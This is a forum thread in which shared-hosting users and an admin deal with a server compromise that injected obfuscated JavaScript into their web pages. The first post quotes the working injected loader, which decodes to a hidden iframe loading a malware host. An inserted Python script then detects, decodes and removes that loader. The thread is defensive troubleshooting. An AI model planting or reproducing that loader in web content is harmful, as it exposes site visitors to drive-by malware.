Malicious script I can't seem to get rid of...





wombatrpgs
Hey...

I recently noticed (like, within the hour), this has been popping up all over my webpages:
Code:
var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result);

It's descrambling a string... Which happens to be a redirect to an awful lot of trojans and viruses. I've attempted to get rid of the thing from my pages, but I'm getting "Unable to open file for writing" errors in DirectAdmin. None of my files can be edited or deleted. The UID changed from wombatrp to root for all .html and .php pages, which are all now 644. The script's also in my functions_php with an echo attached to it, but the syntax is bad, causing every single page on my forum to malfunction. I changed passwords for all accounts... Few questions:

1 - How do I get this thing off? Is there any way to reset the file permissions at this point...?
2 - How did this get here? I've done a bit of searching and it seems this is some sort of PDF insertion exploit. Not sure. I'm pretty sure the password was secure, anyway...
3 - Is this happening to anyone else? Once again, while searching, I found a bunch of posts with this script just put up today. What's going on here?

Thanks for the help.
Bockman
This seems to be a problem with some accounts on Server2. It has been reported earlier and Bondings is already checking accounts and working on a solution.

Please be patient as we work these things out. I am reporting this post to Bondings so he knows about your situation.

Be Well
rebeltrooper
It's the same problem I have, please Bondings fix it!
Utopia GFR
Hi,

This is what I'm getting here :

Quote:
Parse error: syntax error, unexpected '=', expecting ',' or ';' in /home/utopiagf/domains/litterature.frih.net/public_html/forum/common.php on line 206
wombatrpgs
Bockman wrote:
This seems to be a problem with some accounts on Server2. It has been reported earlier and Bondings is already checking accounts and working on a solution.


That's good to hear. As long as something's being done I'm all set. Nice to know it wasn't me who screwed up.

Utopia GFR wrote:
Hi,
This is what I'm getting here :
Parse error: syntax error, unexpected '=', expecting ',' or ';' in /home/utopiagf/domains/litterature.frih.net/public_html/forum/common.php on line 206


That's the one. That would be the script's bad javascript syntax. It looks like it was placed in the common.php file which is included on all the other pages, causing the syntax error all over the place. The thing obviously isn't functioning as intended, but it's still annoying the hell out of me.
Liu
Looks like someone compromised the server. ):
Aredon
I am currently unable to edit anything with FTP or DirectAdmin on my webpage. When you try to upload and replace in any way it will kick you with an error. So I cannot remove this script from my page, nor can I lock it down so that other people are not hit by whatever it is meant to do.
wombatrpgs
Yeah... Same here. That would be the file permissions thing. I guess whatever it was went through and altered all .html and .php files and gave them 644 permissions?
Liu
wombatrpgs wrote:
Yeah... Same here. That would be the file permissions thing. I guess whatever it was went through and altered all .html and .php files and gave them 644 permissions?

644 permissions are fine - it means the owner can read and write to it. What the malicious user did was a chown using root, therefore instead of it being owned by you, it's owned by root. This is potentially scary because it's very possible that root account has been compromised -- ie the server f'ed.

A quick solution that the admins can do is write a quick script to parse through all files in public_html to remove the malicious code. Then start looking into how the user compromised the system and if they installed a backdoor to prevent it from happening again. It may take awhile.
rvec
Probably not root; anyone with permissions to the files can chown files to root. This is more likely an exploit in DirectAdmin which a hacker (script) used to log in to the accounts, edit pages and chown the files to root so the users can't change the files back themselves.
Logging in as root would require the root password, an exploit in the OS or an exploit in a program running under root.
rebeltrooper
It's a Chinese page, hu1.cn and something; in my blog the redirection is on, but nothing happens, it's a trouble.

A real server attack!
wombatrpgs
hu1-hu1.cn is the site. Apparently the failed PDF file it attempts to open is some sort of malware. So, this is a compromise of the individual account or the root account? Or just an exploit through DirectAdmin? This isn't on every single Server2 site, is it?
Utopia GFR
I wonder how many of us are affected by this attack but my forum & blog are down.

Please help us.
cavey
Some more reading about the Bloodhound.Exploit.196:

http://forums.permaculture.org.au/viewtopic.php?f=8&p=45188
http://www.symantec.com/security_response/writeup.jsp?docid=2008-080702-2357-99&tabid=3

I have edited my "public" files now, but hope bondings will come up with a fix that will remove this code from each html/php-file again, and change the ownership(?) of the files, before I go through the rest...
Liu
rvec wrote:
Probably not root; anyone with permissions to the files can chown files to root. This is more likely an exploit in DirectAdmin which a hacker (script) used to log in to the accounts, edit pages and chown the files to root so the users can't change the files back themselves.
Logging in as root would require the root password, an exploit in the OS or an exploit in a program running under root.

That's odd - at least on my Linux systems, it will not allow you to chown to root unless you are root. Which is why I suggested root account may be compromised.

On top of this, why is port 22 open on the server to the world wide web?
QrafTee
Yeah, my website is also having the same issue. I believe I'm on Server 2 as well. I can't seem to change my pages at the moment either. Thanks for checking up on this.
cavey
I copied the file I wanted to change to my computer, deleted the file on the server. Edited the local file, and uploaded it again. That worked for me. I could not edit or replace the file on the server.
wombatrpgs
I'm not able to delete files on the server. How did you do this?

Thanks for the links by the way. That first site is what I was referring to in the first post. It seems this is much more widespread than Server2; that topic started today.
Aredon
Actually yeah, that fix worked for me. I just deleted my entire public_html contents and then uploaded my backup folder (which is completely up to date since I use Dreamweaver) and now the script is gone on my site.

If we could get word on when it will be secure for me to unlock the website for view by my clan members I would be very grateful.
Bondings
Server 2 indeed has been compromised and malicious javascript was injected to a lot of pages. All .html files, the same for .htm. And most likely also some .tpl and .php files were infected. This seems to have happened to a lot of servers the last day(s). I have no idea yet what made this possible.

I am currently running a script (which is half-through the accounts) that should clean up all the files in question. It might leave some html tags in the wrong place (a <html> at the end), but should remove the script itself. At least hopefully most of it, since a few different ones were used apparently.

I'll most likely be moving the accounts to server 3, during the next few days, if possible, since this might happen again.

I'm really sorry for all the problems this caused.
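As an added example (not code from this thread and not Frihost's own cleanup script), the Python script below does what the first post's snippet and Bondings' cleanup describe: it walks a web root, finds the injected `charCodeAt(i)-1` decoder, decodes the string for triage (the string quoted in the first post decodes to the hidden hu1-hu1.cn iframe the thread talks about), strips the snippet, and flags files that were chowned to root. The `<script>` wrapper, the extension list and the sample page are assumptions; only the encoded string is taken from the thread.

```python
# Triage helper for the injected "charCodeAt(i)-1" snippet discussed in this
# thread: find it, decode it, strip it, and flag files now owned by root.
import re
import tempfile
from pathlib import Path
from typing import List, Tuple

# The statement sequence as quoted in the first post; whitespace may vary
# because the same snippet was also pasted inside PHP echo calls.
PAYLOAD_RE = re.compile(
    r'var\s+source\s*=\s*"(?P<src>[^"]*)"\s*;\s*var\s+result\s*=\s*""\s*;\s*'
    r'for\s*\(var\s+i\s*=\s*0\s*;\s*i\s*<\s*source\.length\s*;\s*i\+\+\)\s*'
    r'result\s*\+=\s*String\.fromCharCode\(source\.charCodeAt\(i\)\s*-\s*1\)\s*;\s*'
    r'document\.write\(result\)\s*;?',
    re.DOTALL,
)
# Assumption: in .html files the snippet sits inside its own <script> element.
WRAPPED_RE = re.compile(
    r'<script[^>]*>\s*' + PAYLOAD_RE.pattern + r'\s*</script>',
    re.DOTALL | re.IGNORECASE,
)
# Extensions Bondings listed as infected (.html, .htm, .tpl, .php).
WEB_EXTENSIONS = {".html", ".htm", ".php", ".tpl"}

# Encoded string copied from the first post of the thread.
SAMPLE_ENCODED = ("=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq"
                  "(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?")
# Constructed page: how the snippet looks when appended to an index.html.
SAMPLE_PAGE = (
    "<html><body><h1>My site</h1></body></html>\n"
    '<script>var source ="' + SAMPLE_ENCODED + '"; var result = "";\n'
    "for(var i=0;i<source.length;i++) "
    "result+=String.fromCharCode(source.charCodeAt(i)-1);\n"
    "document.write(result);</script>\n"
)

def decode_payload(encoded: str) -> str:
    """Undo the obfuscation: every character was shifted up by one code point."""
    return "".join(chr(ord(c) - 1) for c in encoded)

def find_injections(text: str) -> List[Tuple[str, str]]:
    """Return (encoded, decoded) pairs for every injected snippet in text."""
    return [(m.group("src"), decode_payload(m.group("src")))
            for m in PAYLOAD_RE.finditer(text)]

def clean_text(text: str) -> Tuple[str, int]:
    """Strip the snippet, <script> wrapper included when present."""
    cleaned, n_wrapped = WRAPPED_RE.subn("", text)
    cleaned, n_bare = PAYLOAD_RE.subn("", cleaned)
    return cleaned, n_wrapped + n_bare

def scan_tree(root: str, fix: bool = False) -> List[dict]:
    """Report infected files and files owned by uid 0 under root (UTF-8 text
    assumed); fix=True removes the snippet in place, which fails on files
    chowned to root exactly as the thread describes."""
    report = []
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in WEB_EXTENSIONS:
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        hits = find_injections(text)
        root_owned = path.stat().st_uid == 0
        if not hits and not root_owned:
            continue
        entry = {"file": str(path), "root_owned": root_owned,
                 "payloads": [decoded for _, decoded in hits], "removed": 0}
        if fix and hits:
            cleaned, count = clean_text(text)
            try:
                path.write_text(cleaned, encoding="utf-8")
                entry["removed"] = count
            except PermissionError:
                entry["removed"] = -1  # needs the server admin (root) to fix
        report.append(entry)
    return report

def demo_scan() -> Tuple[List[dict], List[Tuple[str, str]]]:
    """Write the constructed sample page to a temp dir, scan and clean it."""
    with tempfile.TemporaryDirectory() as tmp:
        page = Path(tmp) / "index.html"
        page.write_text(SAMPLE_PAGE, encoding="utf-8")
        (Path(tmp) / "style.css").write_text("body {}", encoding="utf-8")
        report = scan_tree(tmp, fix=True)
        remaining = find_injections(page.read_text(encoding="utf-8"))
    return report, remaining
```

Run `demo_scan()` to see the report for the constructed page, or `scan_tree("/path/to/public_html")` (without `fix=True`) to only list what it would touch.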
jylan
Thanks so much Bondings for doing all this. I came on this morning to check my stats to find there hadn't been any since last night and that's not normal, so I loaded up my website and found a PHP error for a WordPress plugin file. I deleted that plugin and the page loaded fine, but then I saw a request going out to a .cn site in the status bar and knew something was up.

Same as everyone else I found the script and also my files had root permissions so I couldn't change them. I found a lot more information at this page on a blog: http://www.stephanmiller.com/bugs-viruses-backups-and-prevedvsem123cn/. It might be of help to you Bondings. Supposedly the problem is the Layered Tech which Frihost uses.
jylan
Also Frihost.com was down for a while this morning, and I couldn't access any forums. Was that to do with this problem?
wombatrpgs
Yeah, everything's back up again. Thanks a lot, Bondings.
Bondings
jylan wrote:
Also Frihost.com was down for a while this morning, and I couldn't access any forums. Was that to do with this problem?

The /var partition was full again. As always due to the big logs of frihost.com (and the /var partition is not big). I simply have to move the logs and it works again. I'll fix this permanently another time. But this is definitely nothing to worry about.

Thanks for the link. There seems to be more and more information about it luckily. I already found a cleanup script (which I mentioned) and adapted a bit and it finished executing, so most injected code should be gone.

I'll do the other stuff mentioned there to protect the server. Hopefully this should be enough so I don't have to rush to move the accounts and can at least wait until after the weekend.
wombatrpgs
Ugh, sorry to keep complaining... It seems the UID for all htm/html/php files is still root, which means users still can't edit or change the files that were tampered with. It's alright now that the script's gone, but when it comes time to make changes to any of the site, there's not going to be a clean way to do it. I assume your script's done executing without touching this issue? Is there anything to be done about this? I appreciate the effort.
Ghost900
This answers my question I was going to post.

I just tried to upload my site with FTP and it said "Read Only" and so I tried logging into my DirectAdmin and it won't let me log in.

As long as I know it's not just me I am fine.

If you moved us to server 3 would that change anything for us (Lower PHP or coding)? Or is 2 and 3 almost the same as for PHP scripting?
Liu
My public_html directory is still with permissions 777. It may be a good idea to change this to 755.
Bondings
@Liu, that's probably the symlink, the actual public_html seems to be 755. And normally you should be able to change it in DA.

For the others, yes indeed the files that were infected (and some others too) are still root. Unfortunately if I chown the whole directory, it will also change some files which should have a different group (like email stuff).

If the accounts are moved to a different server, then it seems that the permissions and usernames are automatically fixed to the right ones. So either I will make a script to fix it on Server 2 or you'll have to wait until the accounts are moved (preferably after the weekend).

Server 2 and Server 3 are pretty much the same I think. They both have DirectAdmin. Server 3 has a newer MySQL if I'm not mistaken. PHP should be mostly the same.

@Ghost900, you should be able to log in. This is probably a different problem. Maybe the server was rebooting at the moment you tried to log in?
Liu
Did my public_html disappear? I can still access it via the web, but I can no longer see it in my directadmin.
wombatrpgs
It would seem that the directory is now automatically within domains or something...? I have the same thing. Oh, and to Bondings, it's not a problem if it takes a while to reset the ownership; it's not as pressing as the script was. Thanks.
Bondings
@Liu, the setup in DirectAdmin is actually domains/<domain_name>/public_html/ . There is however a shortcut (symlink) named public_html to the public_html of the default domain, which you can setup in DirectAdmin itself (when choosing the domain). Sometimes it disappears though, but you should be able to add it back by choosing a default domain in DA. In any case, everything should always be accessible through the longer directory structure, it just takes a bit longer to get at that directory I guess.

Also, please everyone check if you still find any of those injected scripts on your web pages? They can only appear on files owned by root, normally, though. If everything went fine all of them should be gone.

About the hack. What I think happened is that LT (the datacenter) had their CMS changed over a year ago, which probably included the password of server 2. Most likely the passwords were sold or something and the last few days at least tens of servers got hacked. The hackers then used a script to put the malicious javascript code on the websites. Pretty much the same everywhere.

I removed the javascript code with another script I found. (I had to modify it a bit to remove another instance it didn't cover) I also removed the backdoors and changed the password. With a bit of luck everything should be fine now. I might still move the websites to server 3, but without the urgency, rather somewhere during the next week(s).
QrafTee
Is it normal for me to still be unable to edit my pages?
There are still some pages on my DirectAdmin owned by root so I cannot delete or do anything to these pages.
jylan
That's great Bondings, I bet stuff like this would never happen if you owned & managed all the servers instead of other companies
inphurno
I was one of the people affected by the attack. I was modifying stuff and then the main page was redirecting to the hu1-hu1.cn site. I thought I really messed things up. Anyway, I wanted to know if there was a reason why only some accounts on server 2 were affected? Was there something I did wrong?
QrafTee
inphurno wrote:
I was one of the people affected by the attack. I was modifying stuff and then the main page was redirecting to the hu1-hu1.cn site. I thought I really messed things up. Anyway, I wanted to know if there was a reason why only some accounts on server 2 were affected? Was there something I did wrong?

I believe it's all the websites on Server 2. Bondings seems to have removed the malicious scripts, but I don't believe we're able to take control of our websites yet because a lot of our pages are owned by "root" and that stops us from modifying or deleting those pages.
wombatrpgs
Hate to be the bearer of bad news, but it's back. Seriously. This is really starting to irritate me. Bondings, could you run that script again, or would this version require some modification? It seems to be identical, down to the string that's being decoded. This is apparently going to remain a constant issue until the accounts are moved.
Arnie
Last Thursday I found such code in a PHP script of mine (http://arnie.frih.net/quotes) and as I didn't have time to investigate, I blocked access to the entire subsite using .htaccess linked to a non-existent .htpasswd. On Friday I checked again and the malicious code (which matched the descriptions given in this topic) was gone. I was still able to edit the files myself so I deleted the entire script although I still have a backup copy on my hard drive. No files were owned by root in my case.

On one hand I'm glad that it wasn't a security leak in my script but on the other hand I'm not exactly thrilled to know the server has been compromised. Perhaps the leak should be fixed instead of removing the symptoms?
wombatrpgs
Yeah, no kidding... So for you it isn't back again now? It seems a different array of accounts on Server2 have been affected then; it looks like a few more people have been adding up topics about this...
Utopia GFR
Back again.

Quote:
Parse error: syntax error, unexpected '=', expecting ',' or ';' in /home/utopiagf/domains/litterature.frih.net/public_html/forum/common.php on line 206


Patience
Arnie
wombatrpgs wrote:
Yeah, no kidding... So for you it isn't back again now? It seems a different array of accounts on Server2 have been affected then; it looks like a few more people have been adding up topics about this...
I just checked and now my index.html is infected and chowned to root.

Here's a suggestion: protect your visitors by locking access to your site using a .htaccess file with the following content:
Code:
AuthUserFile /dev/null
AuthGroupFile /dev/null
AuthName "Site is temporarily closed"
AuthType Basic
<Limit GET POST>
require valid-user
</Limit>
Put it in your public_html directory and all subdirectories will also be secured.
Bondings
I'm really sorry, it seems to have happened again. I guess they came in through some backdoor which I didn't remove. I'm rerunning the script now.
jylan
While this problem is still in the works is there any way that I can change my files' owner back to me instead of root?
QrafTee
jylan wrote:
While this problem is still in the works is there any way that I can change my files' owner back to me instead of root?

That would be great because I haven't been able to edit my pages since it was compromised.
Da Rossa
That's very unfortunate.

My site is experiencing the same weird problems. I'm using KompoZer (based on Nvu) to edit my pages, and I use the built-in FTP function to upload the freshly modified files. Easy.

Today, I got the message, while trying to upload:

Quote:
"550 permission denied"


Then, I tried going manually to my DirectAdmin panel, and upload the files from there. The message was:

Quote:
An Error Occurred

Details

Unable to open /home/darossa/domains/darossa.frih.net/public_html/notas.html for writing

Warning: Saved filesize is less than uploaded filesize. Check quotas.

Click here to go back
After, that, I tried to paste the new html code "in locus", in a manual edit on the DirectAdmin panel itself. The message was:


Quote:
Unable to save your changes

Details

Unable to open /domains/darossa.frih.net/public_html/dir/log.html for writing


darossa Back
Then, finally, I tried via FileZilla 3.1.5, and the message was the simple "Critical error".

What to do?

Observation: while retrying in order to grab the error messages, I got an "Unable to contact [my ip]" from Firefox.
The permissions of the public_html file appear to be 777. Changed to 755 after reading this topic.
The checkboxes for the files under public_html are unavailable, which means that I can't edit or delete the files.
wombatrpgs
Just a thought, nothing I've tried... Try creating a backup of your website, deleting the entire public_html contents, and restoring the backup. Would the files be set back to the original user?
jylan
@wombatrpgs, No I don't think that would work because any files owned by root can't be deleted.
Arnie
Any idea how many accounts there are on server 2? If it would be possible to automatically make a ZIPped backup of each account (like you can do in DirectAdmin) the admins could simply wipe clean and reinstall the entire server (making sure any backdoor is gone as well). Everyone's backup ZIP could then be offered for download during a few months to make sure nobody loses his files, databases and emails.

Just a wild thought. A reinstall would also allow upgrading of all software and scripts to their latest versions.

Edit: I see a reinstall is already being done. Great!
Bondings
@Da Rossa, normally it should work now since the accounts are now on server 3. If you connect to server 3, there should (hopefully) be no error.
catscratches
Great, Bondings!

All the GID is now back to normal. I'll just try to actually edit them...

Edit: Works perfectly!

Thanks a lot!
Da Rossa
Thanks for your calm Bondings!! If I were an admin, I would be pulling off my hair

But my address is still not working. It used to be http://www.darossa.frih.net/notas (where my main site actually resides, while http://www.darossa.frih.net is only a test page), but it's not working.
@directadmin, I can access my pages, which are with the urls like the following:
Quote:
http://www.frih.org:2222/CMD_FILE_MANAGER/domains/darossa.frih.net/public_html/dir/dct1/direito_const1_01-10-08.html


What is the correct (compact) url?

Thanks!
Bondings
Da Rossa wrote:
Thanks for your calm Bondings!! If I were an admin, I would be pulling off my hair

But my address is still not working. It used to be http://www.darossa.frih.net/notas (where my main site actually resides, while http://www.darossa.frih.net is only a test page), but it's not working.
@directadmin, I can access my pages, which are with the urls like the following:
Quote:
http://www.frih.org:2222/CMD_FILE_MANAGER/domains/darossa.frih.net/public_html/dir/dct1/direito_const1_01-10-08.html


What is the correct (compact) url?

Thanks!

It's http://darossa.frih.net/dir/dct1/direito_const1_01-10-08.html . You need to take the domain name and after it everything next to public_html.
Da Rossa
Thanks a lot Mr. Bondings.

Just a lil question though: I published my class notes site (the one that is widely visited by my friends) as http://www.darossa.frih.net/notas, without the .html in the end, and it's not working; we have to add the .html extension in the url. Can I do something to have it work the compact way?

Tks in advance.
QrafTee
Thanks a lot Bondings... but what's going to happen to Server 2? Shut it down and rename Server 3 to Server 2?
Bondings
@Da Rossa, you can do that with a .htaccess file, but please create another topic for that.

@QrafTee, I don't know yet. Maybe I'll transfer the accounts back, maybe not. Maybe I'll close it, maybe put it back as a new server or maybe even something else. I still have to decide. But first I have to finish cleaning up the mess.
Arnie
You could make it a dedicated Frihost gaming server.
wombatrpgs
As long as there are no html or php files, I suppose it can be left vulnerable... Not that that's a good thing, but if it can't be fixed, it's a shame not to use it.
Bondings
wombatrpgs wrote:
As long as there are no html or php files, I suppose it can be left vulnerable... Not that that's a good thing, but if it can't be fixed, it's a shame not to use it.

Of course it will be used. I'm going to format the disk and put a new OS on it. I just haven't decided yet how to use it.
inphurno
Are we going to stay on server 3? The newer version of MySQL would be great
Bondings
inphurno wrote:
Are we going to stay on server 3? The newer version of MySQL would be great

If I move the accounts back to server 2, there is no reason to downgrade again. It would then also be a new version of mysql. Maybe an even newer one.
Da Rossa
Edit: damn, I thought I had created another topic
cavey
Could you delete the files from the old server? My domain is still pointing at it (and I can not change it for a few days), and this #%& gave me a virus or something :/
bloodrider
I'm having the same problems exposed here in the previous posts. I would like to remove that script from my pages, but I don't have access.
Will the solution be our accounts being moved to server 3?
Mr. Bondings, you probably don't have that much time, but can you at least give us an estimate of when our accounts will be moved?

A question, can our (users) passwords be compromised?
Aredon
I believe what I ended up doing was logging onto my ftp and deleting everything, and then uploading from a backup. That seemed to work. Since we've moved to server three though I haven't had any problems.
Arnie
Apparently the compromised server 2 is still up, although frih.net doesn't point there anymore. Is there anything hindering a simple "mke2fs" command on server 2 ??
Bondings
I still need some data on server 2, so that's why it isn't reformatted/os-reinstalled yet. Afterwards I'll probably use it - at first - for the Frihost website and forums.

Also please don't keep your domain on server 2 in any circumstances, but instead use the new account on server 3!
wombatrpgs
By the way, is the max file upload size different on Server 3? I didn't think it was 10 MB before... I could be wrong.
Insanity
I have the same problem. When I access my website, Firefox tells me there's a malicious script running on that page. But when I check the source code for my site, there's nothing strange or unusual on it. I requested a review from Google, but it came back with the same results. Anyone have any ideas?

The site is: http://www.genericists.com/
Bondings
Insanity wrote:
I have the same problem. When I access my website, Firefox tells me there's a malicious script running on that page. But when I check the source code for my site, there's nothing strange or unusual on it. I requested a review from Google, but it came back with the same results. Anyone have any ideas?

The site is: http://www.genericists.com/

Yes the script is still there! Please change the ip address of your domain to 64.92.163.26. Your domain is still pointing to server 2.
Insanity
Oh thanks, I just realized that I had forgotten to change the A record when I thought I did. I'll request another review to Google.
Aredon
So what will become of poor old server two?
Bondings
Aredon wrote:
So what will become of poor old server two?

I still need it for some files/backups at the moment. Afterwards I will put a new OS on it, secure it and use it again. Most likely for the frihost.com (this) website at first.
wombatrpgs
Would that overhaul increase the overall security...? (Apparently I don't understand how this happened anyway) Or maybe just leave it for a while to make sure of no other attacks?
nivinjoy
Someone tell me when this problem will be completely solved...so that I can start working on creating a website, a blog and forum in my account...!!

Last week I installed a WordPress blog in my account and then soon I noticed that there were some unwanted scripts..!! So I deleted the blog and now I wanna create a website in my account...!!

So Admins or moderators please tell me when this problem will be completely solved....!!!!
Bondings
nivinjoy wrote:
Someone tell me when this problem will be completely solved...so that I can start working on creating a website, a blog and forum in my account...!!

Last week I installed a WordPress blog in my account and then soon I noticed that there were some unwanted scripts..!! So I deleted the blog and now I wanna create a website in my account...!!

So Admins or moderators please tell me when this problem will be completely solved....!!!!

It is solved. I moved all accounts to server 3. Please use that account and all should be ok.
nivinjoy
Bondings wrote:
nivinjoy wrote:
Someone tell me when this problem will be completely solved...so that I can start working on creating a website, a blog and forum in my account...!!

Last week I installed a WordPress blog in my account and then soon I noticed that there were some unwanted scripts..!! So I deleted the blog and now I wanna create a website in my account...!!

So Admins or moderators please tell me when this problem will be completely solved....!!!!

It is solved. I moved all accounts to server 3. Please use that account and all should be ok.


Thank You Bondings..!! I will start the work as soon as possible...!!
nivinjoy
It was great of you to solve the problem...!! But let me tell you something...!! The SquirrelMail is not working properly...!! And also what about RoundCube...???

Hope you will solve these problems also very soon...!!
Arnie
There's a topic about the mail problems, please post there to bring it to attention...
http://www.frihost.com/forums/vt-99901.html